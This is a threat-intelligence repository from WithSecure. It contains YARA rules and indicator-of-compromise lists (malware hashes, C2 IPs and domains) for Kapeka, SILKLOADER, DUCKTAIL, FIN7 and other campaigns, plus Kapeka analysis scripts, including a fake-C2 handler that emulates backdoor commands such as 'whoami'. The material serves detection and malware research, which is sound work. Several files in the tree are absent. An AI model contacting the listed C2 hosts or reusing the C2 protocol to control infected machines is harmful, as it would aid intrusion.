├── Kapeka
    ├── .gitignore
    ├── requirements.txt
    ├── kapeka_backdoor.yar
    ├── iocs.csv
    ├── README.md
    ├── kapeka_extract_backdoor.py
    ├── kapeka_http_handler.py
    └── kapeka_extract_config.py
├── README.md
├── SILKLOADER
    ├── silkloader.yar
    └── iocs.csv
├── DUCKTAIL
    ├── ducktail_nativeaot.yara
    ├── ducktail_artifacts.yar
    ├── ducktail_exceldna_packed.yara
    ├── ducktail_dotnet_core_infostealer.yar
    └── iocs.csv
├── TangleCrypt
    ├── TangleCrypt_YARA.yar
    └── TangleCrypt_IOC.csv
├── LICENSE
├── WEBJACK
    └── WEBJACK_IOC.csv
├── FIN7VEEAM
    └── iocs.csv
├── KeeLoader
    └── keeloader_iocs.csv
├── TamperedChef
    └── TamperedChef_IOC.csv
└── WeevilProxy
    └── weevilproxy_iocs.csv


/Kapeka/.gitignore:
--------------------------------------------------------------------------------
1 | 
2 | 


--------------------------------------------------------------------------------
/Kapeka/requirements.txt:
--------------------------------------------------------------------------------
1 | pefile
2 | pycryptodome
3 | wincrypto
4 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | Contains indicators of compromise (IOCs) from published reports and investigations


--------------------------------------------------------------------------------
/SILKLOADER/silkloader.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | rule SILKLOADER
 3 | {
 4 |     meta:
 5 |         author="WithSecure"
 6 |         description="Detects SILKLOADER samples"
 7 |         date="2023-03-15"
 8 |         version="1.0"
 9 |         reference="https://labs.withsecure.com/publications/silkloader"
10 |         hash1="c83ac6dc96febd49c7c558e8cf85dd8bcb3a84fdc78b3ba72ebf681566dc1865"
11 |         hash2="e4dadabd1cee7215ff6e31e01f6b0dd820851685836592a14f982f2c7972fc25"
12 |         hash3="d77a59e6ba3a8f3c000a8a8955af77d2898f220f7bf3c0968bf0d7c8ac25a5ad"
13 |     strings:
14 |         $str1 = {5400520041004e005300460045005200}
15 |         $str2 = {760062006300630073006200}
16 |     condition:
17 |         pe.is_pe
18 |         and pe.characteristics & pe.DLL
19 |         and all of them
20 | }


--------------------------------------------------------------------------------
/Kapeka/kapeka_backdoor.yar:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | rule kapeka_backdoor
 3 | {
 4 |   meta:
 5 |         author="WithSecure"
 6 |         description="Detects Kapeka backdoor based on common strings."
 7 |         date="2024-04-17"
 8 |         version="1.0"
 9 |         reference="https://labs.withsecure.com/publications/kapeka"
10 |         hash1="97e0e161d673925e42cdf04763e7eaa53035338b"
11 |         hash2="9bbde40cab30916b42e59208fbcc09affef525c1"
12 |         hash3="6c3441b5a4d3d39e9695d176b0e83a2c55fe5b4e"
13 |   strings:
14 |     $a = "Azbi3l1xIgcRzTsOHopgrwUdJUMWpOFt" ascii
15 |     $b = "PID : " wide
16 |     $c = "ExitCode : " wide
17 |     $d = "1: " wide
18 |     $e = "2: " wide
19 |   condition:
20 |     pe.is_dll() and filesize > 50000 and filesize < 500000 and 4 of them 
21 | }


--------------------------------------------------------------------------------
/DUCKTAIL/ducktail_nativeaot.yara:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | rule ducktail_nativeaot
 3 | {
 4 |     meta:
 5 |         author="WithSecure"
 6 |         description="Detects NativeAOT variants of DUCKTAIL malware"
 7 |         date="2022-11-17"
 8 |         version="1.0"
 9 |         reference="https://labs.withsecure.com/publications/ducktail_returns"
10 |         hash1="b043e4639f89459cae85161e6fbf73b22470979e"
11 |         hash2="073b092bf949c31628ee20f7458067bbb05fda3a"
12 |         hash3="d1f6b5f9718a2fe9eaac0c1a627228d3f3b86f87"
13 |      condition:
14 |         uint16(0) == 0x5A4D
15 |         and filesize > 15MB
16 |         and (pe.section_index(".managed") >= 0
17 |             or pe.exports("DotNetRuntimeDebugHeader")
18 |         )
19 |         and pe.exports("SendFile")
20 |         and pe.exports("Start")
21 |         and pe.exports("Open")
22 | }


--------------------------------------------------------------------------------
/DUCKTAIL/ducktail_artifacts.yar:
--------------------------------------------------------------------------------
 1 | rule ducktail_artifacts
 2 | {
 3 |     meta:
 4 |         author="WithSecure"
 5 |         description="Detects artifacts found in files associated to DUCKTAIL malware"
 6 |         date="2022-07-18"
 7 |         version="1.0"
 8 |         reference="https://labs.withsecure.com/publications/ducktail"
 9 |         hash1="3dbd9e1c3d0fd6358d4adcba04fdfc0b6e8acc49"
10 |         hash2="9370243589327b458486e3f7637779c2a96b4250"
11 |         hash3="b98170b18b906aee771dbd4dbd31e5963a90a50e"
12 |     strings:
13 |         $pdb_path_1 = /[a-z]\:\\projects\\(viruttest|virot)\\/i nocase ascii
14 |         $pdb_path_2 = /[a-z]\:\\users\\ductai\\/i nocase ascii
15 |         $pdb_path_3 = "\\dataextractor.pdb" nocase ascii
16 |         $email = "ductai2308@gmail.com" wide ascii
17 |      condition:
18 |         uint16(0) == 0x5A4D
19 |         and any of them
20 | }
21 | 


--------------------------------------------------------------------------------
/Kapeka/iocs.csv:
--------------------------------------------------------------------------------
 1 | Type,Value,Note,Seen in,Seen on
 2 | Filename,crdss.exe,Backdoor dropper file name,Ukraine,Jun-22
 3 | Filename,%SYSTEM%\win32log.exe,Backdoor dropper file name,Estonia,Sep-22
 4 | SHA1,80fb042b4a563efe058a71a647ea949148a56c7c,Backdoor dropper hash,Ukraine,Jun-22
 5 | SHA1,5d9c189160423b2e6a079bec8638b7e187aebd37,Backdoor dropper hash,Estonia,Sep-22
 6 | SHA1,6c3441b5a4d3d39e9695d176b0e83a2c55fe5b4e,Backdoor hash,Estonia,Sep-22
 7 | SHA1,97e0e161d673925e42cdf04763e7eaa53035338b,Backdoor hash,Ukraine,May-23
 8 | SHA1,9bbde40cab30916b42e59208fbcc09affef525c1,Backdoor hash,Ukraine,Jun-22
 9 | URL,https[:]//103[.]78[.]122[.]94/help/healthcheck,Backdoor C2 address,-,-
10 | URL,https[:]//88[.]80[.]148[.]65/news/article,Backdoor C2 address,-,-
11 | URL,https[:]//185[.]181[.]229[.]102/home/info,Backdoor C2 address,-,-
12 | URL,https[:]//185[.]38[.]150[.]8/star/key,Backdoor C2 address,-,-
13 | 


--------------------------------------------------------------------------------
/TangleCrypt/TangleCrypt_YARA.yar:
--------------------------------------------------------------------------------
 1 | rule tanglecrypt
 2 | {
 3 |     meta:
 4 |         author="WithSecure"
 5 |         description="Detects samples packed with TangleCrypt"
 6 |         date="2025-11-25"
 7 |         version="1.0"
 8 |         reference="https://labs.withsecure.com/publications/tanglecrypt"
 9 |         hash1="2936f5f3ff24f5bb42eace4ad2d64989b19dc6cd75d8f4ee83496ee6bdf169f6"
10 |         hash2="fb3fc93dc627c7dfd8d95c1d66c2cb66caac92783b6d6eb33ac5b91647871ae6"
11 |     strings:
12 |         // "Can't call WinAPI function"
13 |         $str1 = { 43 61 6E 27 74 20 63 61 6C 6C 20 57 69 6E 41 50 49 20 66 75 6E 63 74 69 6F 6E }
14 |         // mov r8d, 0x8D7 -- (...) -- call <memcpy>
15 |         $opc_x64 = { 41 B8 D7 08 00 00 [0-10] ( E8 | FF 15 ) }
16 |         // push 0x8D7 -- (...) -- call <memcpy>
17 |         $opc_x86 = { 68 D7 08 00 00 [0-10] ( E8 | FF 15 ) }
18 |     condition:
19 |         // MZ
20 |         uint16(0) == 0x5A4D
21 |         // PE
22 |         and (uint32(uint32(0x3C)) == 0x00004550)
23 |         // strings
24 |         and all of ($str*)
25 |         // opcodes
26 |         and (#opc_x64 > 50 or #opc_x86 > 50)
27 | }
28 | 


--------------------------------------------------------------------------------
/DUCKTAIL/ducktail_exceldna_packed.yara:
--------------------------------------------------------------------------------
 1 | import "pe"
 2 | rule ducktail_exceldna_packed
 3 | {
 4 |     meta:
 5 |         author="WithSecure"
 6 |         description="Detects Excel Add-in variants of DUCKTAIL malware"
 7 |         date="2022-11-17"
 8 |         version="1.0"
 9 |         reference="https://labs.withsecure.com/publications/ducktail_returns"
10 |         hash1="e11b55bea4cd63d09220eaf72ffb591838ac54fb"
11 |         hash2="630f467fda3ac80eaa2f23b141aff122f501504e"
12 |         hash3="2a3a7682e9e77b3124a09dff0167fffe9d91c8b7"
13 |     strings:
14 |         $xll_str_1 = "exceldna" nocase ascii
15 |         $xll_str_2 = "iexceladdin" nocase ascii
16 |         $encryption_str_1 = "zbase32" nocase ascii
17 |         $encryption_str_2 = "sharpaescrypt" nocase ascii
18 |         $encryption_str_3 = "confuserex" nocase ascii
19 |         $dt_module_name = "exceladdinbuilder" nocase ascii
20 |      condition:
21 |         uint16(0) == 0x5A4D
22 |         and any of ($xll_str_*)
23 |         and (2 of ($encryption_str_*)
24 |              or for any res in pe.resources : ( res.name_string == "C\x00O\x00N\x00F\x00I\x00G\x00" and hash.sha256(res.offset, res.length) == "08515030bb98ffd03fcbf15788e49d155a59cdbc74be27066542e8c0e29214f9")
25 |              or $dt_module_name
26 |         )
27 | }


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | BSD 2-Clause License
 2 | 
 3 | Copyright (c) [2022], [WithSecure Oyj]
 4 | 
 5 | Redistribution and use in source and binary forms, with or without
 6 | modification, are permitted provided that the following conditions are met:
 7 | 
 8 | 1. Redistributions of source code must retain the above copyright notice, this
 9 |    list of conditions and the following disclaimer.
10 | 
11 | 2. Redistributions in binary form must reproduce the above copyright notice,
12 |    this list of conditions and the following disclaimer in the documentation
13 |    and/or other materials provided with the distribution.
14 | 
15 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
16 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
17 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
18 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
19 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
20 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
21 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
22 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
23 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
24 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.


--------------------------------------------------------------------------------
/WEBJACK/WEBJACK_IOC.csv:
--------------------------------------------------------------------------------
1 | Type,Value,Description
IPv4 Address,79[.]142[.]76[.]244,Cobalt Strike C2 address
Domain,tdk[.]hunanduodao[.]com,IIS C2
Domain,tdk[.]jmfwy[.]com,IIS C2
Domain,jiankong[.]sneaws[.]com,IIS C2
Domain,seo[.]667759[.]com,IIS C2
Domain,google2[.]sneaws[.]com,IIS C2
Domain,kaifa[.]sneaws[.]com,IIS C2
Domain,w3c[.]sneaws[.]com,IIS C2
Domain,w5c[.]sneaws[.]com,IIS C2
Domain,w5r[.]sneaws[.]com,IIS C2
Domain,google[.]sneaws[.]com,IIS C2
Domain,jk[.]667759[.]com,IIS C2
SHA256,11265422e79f2cd057ee1ae38a16e5db54039711ae8cdb9e177aebfde5666f32,fasthttp.dll
SHA256,c9b4657b6aea927bb0f601f2063e743f8702408c98d01ca3332692b29c4d90ca,fashttp.dll
SHA256,c65dea5d6ab244520a794de0bc9a232050b632b391b3cd3a616661f03d9d2619,fashttp.dll
SHA256,b0842c9916449de6d4b4159d6c5af747d6fb40609510d6a8d2eb669932c1f661,fashttp.dll
SHA256,72cf397738724b1f555c147005c61c058619405846460a60b02a2af75b57a81e,cgihttp.dll
SHA256,c17d1bb654bfa9ff9f612d37c1204585cfc76d663818a23aac78ba43e35e3df0,cgihttp.dll
SHA256,9a2fd34e22c5f3d3d5fb96e3cd514dad7b03ed7bf53a87e7d8d9b73987d02ece,cgihttp.dll
SHA256,98d4d3de1af9d8568ededbddad4ed5a2072393985421462f44d12e482a1a36af,cgihttp.dll
SHA256,6b60b6df8a1a95f51ffe57255c05d26eb9e113857efac3b29d6ef080b8d414f3,cgihttp.dll
SHA256,561fcf1a2d6cc2170d2b538f416e95d981663984e384da51b36ffe97d2653dcd,Cobalt Strike Beacon
SHA256,767576a2b67a3a53883b174a50c83192d0930a4ce213af5f5093e6ee26910d2b,Cobalt Strike Beacon
SHA256,ffbad7beab3e0888d6957637f2ec80156402ad540e9c92ebb243fe27bea1f598,XlAnyLoader
SHA256,00c7efe65ab90c03678359f5ba6b24d9f938a28205652dd61f15d7a31323cf1b,SoftEther VPN
SHA256,bab9a644aff24cf313210cc6632f71d935a428ea0efb3823c0dbe6dccabe4b73,SoftEther VPN
SHA256,cbbe63d47e377ab93a39d11554b3024760868bf667db388efc62e6f2850b5d89,SoftEther VPN
SHA256,86b8605b4870be8c3e83e51b4e3ee80e781a7c5a0104ffa656da651a03579c5a,FScan
SHA256,d8c0ef6dbf7d4572f92d3a492f32061ab8f3dd46beb9ff5a0bf9bf550935458c,Sharp4RemoveLog
SHA256,48ec6530470b295db455bf2c72dc4fbd18672725f45821304f966d436b428865,CnCrypt Protect
SHA256,e51ea911a281097be040ac2871134e6c7d5c3b37c8b46d2267ad40a18a05d2ec,GoToHTTP
SHA256,ffa835cd05558fa52a12e91136c4e8a3e7393b3155a6be7877812c6e7d1ff811,httpcgi.dat
2 | 


--------------------------------------------------------------------------------
/Kapeka/README.md:
--------------------------------------------------------------------------------
 1 | # Kapeka
 2 | These artifacts are related to WithSecure’s investigation on Kapeka.
 3 | 
 4 | A report with detailed analysis titled "Kapeka: A novel backdoor spotted in Eastern Europe" is available on WithSecure Labs Blog: https://labs.withsecure.com/publications/kapeka
 5 | 
 6 | List of artifacts:
 7 | * `iocs.csv` is a list of indicators of compromise (IOCs) for Kapeka in CSV format.
 8 | * `kapeka_backdoor.yar` is a YARA rule that can detect Kapeka backdoor samples.
 9 | * `kapeka_extract_backdoor.py` is a Python script to extract and decrypt the backdoor binary from the dropper’s resource section. Usage explained below.
10 | * `kapeka_http_handler.py` is a script to decrypt and emulate Kapeka’s network communication. This has been implemented as a custom HTTP handler for [fakenet](https://github.com/mandiant/flare-fakenet-ng). Usage explained below.
11 | * `kapeka_extract_config.py` is a script to extract Kapeka’s configuration from either registry or embedded within the backdoor binary. Usage explained below.
12 | 
13 | ## Usage
14 | ### kapeka_extract_backdoor.py
15 | This script will extract and decrypt backdoor binaries found in Kapeka's dropper. It will save the decrypted resources into the current working directory. This script can only be executed on Windows.
16 | 
17 | Requires Python >= 3.7.8 and Python library: `pycryptodome`
18 | 
19 | Example of usage:
20 | `$ python kapeka_extract_backdoor.py dropper.exe`
21 | 
22 | ### kapeka_extract_config.py
23 | This script will extract Kapeka's configuration from either local registry or embedded within the backdoor binary. To extract from local registry, this script needs to be executed on a machine infected with Kapeka.
24 | 
25 | Requires Python >= 3.7.8 and Python library: `pycryptodome`
26 | 
27 | Example of usage (to extract from local registry):
28 | `$ python kapeka_extract_config.py`
29 | 
30 | Example of usage (to extract from binary)
31 | `$ python kapeka_extract_config.py backdoor.exe`
32 | 
33 | ### kapeka_http_handler.py
34 | This script is a custom HTTP handler for Kapeka's network communication. It can be used to emulate Kapeka's C2 responses and dump its requests. This has been implemented and tested with [fakenet](https://github.com/mandiant/flare-fakenet-ng).
35 | 
36 | To get started you need to:
37 | * Generate an RSA-2048 key pair.
38 | * Replace the private key in the script with the generated private key.
39 | * Replace the public key in the Kapeka backdoor you want to analyze with the generated public key.
40 | * Configure fakenet to use the provided script to handle HTTP traffic for Kapeka C2 addresses.
41 | 


--------------------------------------------------------------------------------
/Kapeka/kapeka_extract_backdoor.py:
--------------------------------------------------------------------------------
 1 | import pefile
 2 | import struct
 3 | import re
 4 | from Crypto.Cipher import AES
 5 | from wincrypto import CryptCreateHash, CryptExportKey, CryptDeriveKey, CryptHashData
 6 | from wincrypto.constants import CALG_MD5, CALG_AES_256 
 7 | from ctypes.wintypes import DWORD, LPVOID , UINT, BOOL, BYTE, LPCSTR
 8 | import sys
 9 | from pathlib import Path
10 | 
11 | def read_file():
12 |     args = sys.argv
13 |     if len(args) < 2 or len(args) > 3:
14 |         print('Usage: python kapeka_extract_backdoor.py dropper.exe')
15 |         exit()
16 |     try:
17 |         file_path = sys.argv[1]
18 |         file_data = None
19 |         with open(file_path, 'rb') as f:
20 |             file_data = f.read()
21 |     except Exception as e:
22 |         print(f'Input file path ({file_path}) could not be read')
23 |         print(e)
24 |         exit()
25 |     return file_data, file_path
26 | 
27 | def parse_password(file_data, pe_file):
28 |     egg = rb'\x66\x83\x3D(....)\x00\xB8(....)'
29 |     for m in re.finditer(egg, file_data):
30 |         if m.group(1) != m.group(2):
31 |             print('Password not found in binary')
32 |             exit()
33 |         pwd_va = struct.unpack('<I', m.group(1))[0]
34 |         pwd = pe_file.get_data(pwd_va - pe_file.OPTIONAL_HEADER.ImageBase,16)
35 |     return pwd
36 | 
37 | def parse_resources(pe_file):
38 |      resources = []
39 |      for rsrc in pe_file.DIRECTORY_ENTRY_RESOURCE.entries:
40 |         for entry in rsrc.directory.entries:
41 |                 offset = entry.directory.entries[0].data.struct.OffsetToData
42 |                 size = entry.directory.entries[0].data.struct.Size
43 |                 id = entry.id
44 |                 resources.append((offset,size,id))
45 |      return resources
46 | 
47 | def decrypt_aes(encrypted_data, key):
48 |     iv = b'\x00'*16
49 |     cipher = AES.new(
50 |         key,
51 |      AES.MODE_CBC,
52 |      IV=iv)
53 |     decrypted = cipher.decrypt(encrypted_data)
54 |     # remove padding
55 |     decrypted = decrypted[:-16]
56 |     return decrypted
57 | 
58 | def process_resources(resources, password, file_path):
59 |      for offset, size, entry_id in resources:
60 |         data = pe.get_memory_mapped_image()[offset:offset+size]
61 |         decryption_key = aes_generate_key_winapi(password)
62 |         decrypted = decrypt_aes(data, decryption_key)
63 |         file_name = Path(file_path).stem + f'_decrypted_resource_{entry_id}.dmp'
64 |         with open(file_name,'wb') as w:
65 |             print(f'Saving decrypted resource {entry_id} into {file_name}')
66 |             w.write(decrypted)
67 | 
68 | def aes_generate_key_winapi(password):
69 |     hHash = CryptCreateHash(CALG_MD5)
70 |     password = password.replace(b'\x00',b'').decode('utf-8').encode('utf-16le')
71 |     CryptHashData(hHash, password)
72 |     hKey = CryptDeriveKey(hHash, CALG_AES_256)
73 |     return hKey.key
74 | 
75 | 
76 | if __name__ == "__main__":
77 |     file_data, file_path = read_file()
78 |     pe = pefile.PE(data=file_data)
79 |     try:
80 |         password = parse_password(file_data, pe)
81 |         resources = parse_resources(pe)
82 |         process_resources(resources, password, file_path)
83 |     except Exception as e:
84 |         print('Error processing file...')
85 |         print(e)
86 |         exit()
87 | 


--------------------------------------------------------------------------------
/SILKLOADER/iocs.csv:
--------------------------------------------------------------------------------
 1 | Indicator type,Data
 2 | SILKLOADER_SHA256,0248572780e94f3557c50d2c161365f09b175438ed5e750ccc5b5f1c895118c2
 3 | SILKLOADER_SHA256,2e57d2d14d8f98464e501d99dad0ae2c2f237b45aceecb73850c17ad1455e39c
 4 | SILKLOADER_SHA256,3d1df6633ec9b16f856c6ddf7c40138e524f7c5e286af2271e32643f88f071a2
 5 | SILKLOADER_SHA256,4346d2098d93a7f6fddd4c37333f8ec17ff548c97f365b831abbb63dd426ed4b
 6 | SILKLOADER_SHA256,54d45b872ee6651d670c3580da74ca56f626bc6ed5ce60cc7e3ba71bb68cd23f
 7 | SILKLOADER_SHA256,5623f7b2a3e459d91ed85d20c20b58fb7edc166c63a3a72b703d7af400bdc12c
 8 | SILKLOADER_SHA256,56377607abfb0616fc1dc222cc765966954155b69b5c4b16cad92cdd353720a4
 9 | SILKLOADER_SHA256,575caa641dbb83364e8c0664737666f3bcd24d40316ff149c9ef476115b927cb
10 | SILKLOADER_SHA256,7070b232de836ce33b7778f6b6f7aecb252d542831367bc78d0eea77461be9a7
11 | SILKLOADER_SHA256,7c2ea97f8fff301a03f36fb6b87d08dc81e948440c87c2805b9e4622eb4e1991
12 | SILKLOADER_SHA256,7d438e1664448dce4a1fb9536b1a9496505fec2ae535ca37dd0299ac70355400
13 | SILKLOADER_SHA256,972ab4694d8177e65de6aef5b6eb0c1e1cafd1cad7bdea484e37ffb156184f34
14 | SILKLOADER_SHA256,a6fff6890c0b6642931f9b0bfd67f830bb85af0f218280776170abfcc5baa576
15 | SILKLOADER_SHA256,c83ac6dc96febd49c7c558e8cf85dd8bcb3a84fdc78b3ba72ebf681566dc1865
16 | SILKLOADER_SHA256,d77a59e6ba3a8f3c000a8a8955af77d2898f220f7bf3c0968bf0d7c8ac25a5ad
17 | SILKLOADER_SHA256,e4dadabd1cee7215ff6e31e01f6b0dd820851685836592a14f982f2c7972fc25
18 | SILKLOADER_SHA256,f1f5142a456e8a316b281ad7f2fe1b463d93f30460a6be3afa9c5593f1392656
19 | SILKLOADER_SHA256,262d966fd82312bcb82b056b2dc378b173f5c335917bc53125aef7f5a03cfce4
20 | BAILLOADER_SHA256,1ef852362ab9bb0af061eb8a19556962c7f5a350e3ef0c2751401afd4cef9f3e
21 | BAILLOADER_SHA256,676ace0449fbad2f5498df7b16c3576f73252f23032604e1a94ce4b5a855974e
22 | BAILLOADER_SHA256,70826162169e5326601d85a0b459645c6bf8fda641d3d3015c035da0cf16db42
23 | BAILLOADER_SHA256,75288b3d1da8d634477609ea804a351915aa7f0a12a50e1eba1d8578debc8ab2
24 | BAILLOADER_SHA256,994f2777f175a6fb784df7b138069f0a6503a458df67915317f23a0a37c16067
25 | BAILLOADER_SHA256,a0b496d927dd1b2e01fcb29c2ef76671e34e7cd841e485c401e15dccad8e897e
26 | BAILLOADER_SHA256,d93155adefca33960a5a125f10854dc8178e80e9bf3b86600a4c59647dd80114
27 | RPCTaskScheduler_SHA256,0322f9201a3887659f7568f3f2292248e29afc19a6e80cdda6915834a3fc925d
28 | SILKLOADER_dropper_SHA256,9c1914143b0ba7fa15848223d0695664fc8225c37eed09eeb00e0af1b7ee0d7b
29 | SILKLOADER_dropper_SHA256,bf02668f884937f697af326a6678fe5c1d3844e104da8c4049f23d63dcb5bb5c
30 | SILKLOADER_dropper_SHA256,d378d01f863454911a345869b66d60769a894c74dfebaa0a9a07efc884a3d15c
31 | CS_Go_Beacon_SHA256,04c7a062a9bd9fe6fe1b0c4e72e319aff866a42b21d8971f1215c347ee5e8980
32 | CS_Go_Beacon_SHA256,e24be344923aea8223fe90f23bfa7151b149ef032e67ba5972a9a10bd63effc6
33 | CS_Go_Beacon_SHA256,326383ed5b2480fac2b5aad00c7ae198f290f0ec4c86503b86fabe748cdf904e
34 | IP,198.98.53.34
35 | IP,193.106.191.187
36 | IP,193.106.191.208
37 | IP,107.148.12.162
38 | IP,45.144.179.204
39 | Domain,020-rce500.r1z.rocks
40 | Domain,cerupedi.com
41 | Domain,d3-up.ssndob.cn.com
42 | Domain,data.hik.icu
43 | Domain,dl.kaspersky360.com
44 | Domain,dl.kasperskyupdates.com
45 | Domain,dns.anbush.com
46 | Domain,gedabuyisi.com
47 | Domain,hc32.weixinzx.org
48 | Domain,hc64.hserverdns.com
49 | Domain,hs.hserverdns.com
50 | Domain,l01i1.ssndob.cn.com
51 | Domain,main.hik.icu
52 | Domain,p4nd4.bbcinternationalnews.com
53 | Domain,p4nd41.ssndob.cn.com
54 | Domain,p4nd42.ssndob.cn.com
55 | Domain,sc.hserverdns.com
56 | Domain,sc32.hserver.dns-dns.com
57 | Domain,service-d9pbyhs4-1305051246.gz.apigw.tencentcs.com
58 | Domain,service-dxkujbtv-1305051246.sh.apigw.tencentcs.com
59 | Domain,sezijiru.com
60 | Domain,sn1ff.ssndob.cn.com
61 | Domain,sn1ff1.kasperslkyupdate.com
62 | Domain,sn1ff2.kasperslkyupdate.com
63 | Domain,upd.kasperskyupdates.com
64 | Domain,update-2.kaspersky360.com
65 | Domain,z3a.r1z.rocks
66 | Domain,z3a1.ssndob.cn.com
67 | Domain,z3a2.ssndob.cn.com
68 | Domain,cdn.goby.pw


--------------------------------------------------------------------------------
/Kapeka/kapeka_http_handler.py:
--------------------------------------------------------------------------------
  1 | import socket
  2 | import io
  3 | import struct
  4 | from binascii import hexlify
  5 | import sys
  6 | from Cryptodome.PublicKey import RSA
  7 | from Cryptodome.Cipher import PKCS1_v1_5, AES
  8 | from base64 import b64decode
  9 | from Cryptodome.Util.Padding import pad, unpad
 10 | 
 11 | 
 12 | # Generate your own RSA-2048 key pair, don't forget to replace public key in backdoor 
 13 | private_key = """PRIVATEKEYGOESHERE"""
 14 | 
 15 | def xor_value(value, key):
 16 |     encrypted_text = b''
 17 |     for i in range(len(value)):
 18 |         val = value[i] ^ key[i%len(key)]
 19 |         encrypted_text += bytes([val])
 20 |     return encrypted_text
 21 | 
 22 | 
 23 | def decrypt_rsa(encrypted_data, key):
 24 |     rsa_key = RSA.importKey(key)
 25 |     rsakey = PKCS1_v1_5.new(rsa_key)
 26 |     data = encrypted_data
 27 |     return rsakey.decrypt(data[::-1], None)
 28 | 
 29 | 
 30 | def encrypt_aes(data, key):
 31 |     iv = b'\x00'*16
 32 |     cipher = AES.new(
 33 |         key,
 34 |      AES.MODE_CBC,
 35 |      IV=iv)
 36 |     return cipher.encrypt(pad(data,AES.block_size))
 37 | 
 38 | 
 39 | def decrypt_aes(encrypted_data, key):
 40 |     iv = b'\x00'*16
 41 |     cipher = AES.new(
 42 |         key,
 43 |      AES.MODE_CBC,
 44 |      IV=iv)
 45 |     return unpad(cipher.decrypt(encrypted_data), AES.block_size).decode('utf-16le')
 46 | 
 47 | 
 48 | def handle_response(data):
 49 |     sio = io.BytesIO(data)
 50 |     xor_key = sio.read(4)
 51 |     rest_output = sio.read()
 52 |     rest_output_xored = xor_value(rest_output, xor_key)
 53 |     sio = io.BytesIO(rest_output_xored)
 54 | 
 55 |     big_endian_encrypted_key_length = sio.read(4)
 56 |     encrypted_key_length = struct.unpack(">I", big_endian_encrypted_key_length)[0]
 57 |     encrypted_key = sio.read(encrypted_key_length)
 58 |     decrypted_key = decrypt_rsa(encrypted_key, private_key)
 59 | 
 60 |     big_endian_encrypted_data_length = sio.read(4)
 61 |     encrypted_data_length = struct.unpack(">I", big_endian_encrypted_data_length)[0]
 62 |     encrypted_data = sio.read(encrypted_data_length)
 63 |     decrypted_data = decrypt_aes(encrypted_data,decrypted_key)
 64 | 
 65 |     return decrypted_key, decrypted_data
 66 | 
 67 | def HandleRequest(req, method, post_data=None):
 68 |     """
 69 |     Request format
 70 |         <4-byte XOR key><BE-EncryptedKeyLength><EncryptedKey><BE-EncryptedDataLength><EncryptedData><RandomData>
 71 | 
 72 |         Logic:
 73 |             Extract XOR key from first 4 bytes
 74 |                 XOR rest of response
 75 |                     Next 4 bytes indicate length of encrypted key
 76 |                         Extract next n bytes
 77 |                             Decrypt via private key
 78 |                                 Next 4 bytes indicate length of encrypted data
 79 |                                     Extract next n bytes
 80 |                                         Decrypt via decrypted key
 81 |                                             Log raw data
 82 |     Response:
 83 |         Use same decrypted key to encrypt response
 84 |         Response format
 85 |             Update configuration
 86 |                 Example:
 87 |                     {\"GafpPS\": {\"LsHsAO\": [\"https://127.0.0.1/news/article\"], \"hM4cDc\": 5, \"nLMNzt\": 10}}
 88 |                     {\"Td7opP\": [{\"J8yWIG\": \"Execute command\", \"CwbJ4E\": 5, \"XVXLNm\": \"whoami\", \"INlB5X\":\"\"}]}
 89 |             Execute backdoor command                                                                                                                                            
 90 | 
 91 |     """
 92 | 
 93 |     response_config_update = '{\"GafpPS\": {\"LsHsAO\": [\"https://133.133.133.133/doot/article\"], \"hM4cDc\": 3, \"nLMNzt\": 10}}'
 94 |     response_execute_command = '{\"Td7opP\": [{\"J8yWIG\": \"Execute command\", \"CwbJ4E\": 5, \"XVXLNm\": \"whoami\", \"INlB5X\":\"\"}]}'
 95 |     response = response_config_update
 96 |     decrypted_key, decrypted_data = handle_response(post_data)
 97 |     print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
 98 |     print('Decrypted data blob: ')
 99 |     print(decrypted_data)
100 |     print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
101 |     print('Sending encrypted response: ')
102 |     print(response)
103 |     print('~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~')
104 |     response = encrypt_aes(response.encode('utf-16le'),decrypted_key)
105 |     req.send_response(200)
106 |     req.send_header('Content-Length', len(response))
107 |     req.end_headers()
108 |     req.wfile.write(response)


--------------------------------------------------------------------------------
/FIN7VEEAM/iocs.csv:
--------------------------------------------------------------------------------
 1 | Indicator type,Value,Note
 2 | SHA1,8687b6b1508a93556d6e30d14e5c4ee9971f2d80,"POWERTRASH ""icsnd16_64refl.ps1"" sample"
 3 | SHA1,b621f8c5e9033718b4e9d47a2f0eccb9783f612a,"DUBLOADER ""libcurl.dll"" sample"
 4 | SHA1,e5480a47172e3f75dbf0384f4ca82c7b47910e0f,"POWERTRASH ""icbt11801_64refl.ps1"" sample"
 5 | IP,217.12.206.176,DICELOADER C2
 6 | IP,162.248.225.115,DICELOADER C2
 7 | IP,45.136.199.128,DICELOADER C2
 8 | IP,91.149.243.181,DICELOADER C2
 9 | IP,91.199.147.152,DICELOADER C2
10 | IP,95.217.49.123,DICELOADER C2
11 | IP,77.75.230.112,DICELOADER C2
12 | IP,194.87.148.41,DICELOADER C2
13 | IP,195.123.244.162,DICELOADER C2
